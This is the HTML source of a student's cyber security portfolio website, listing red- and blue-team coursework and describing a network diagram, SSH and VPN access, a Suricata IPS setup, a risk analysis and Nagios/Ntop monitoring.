          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
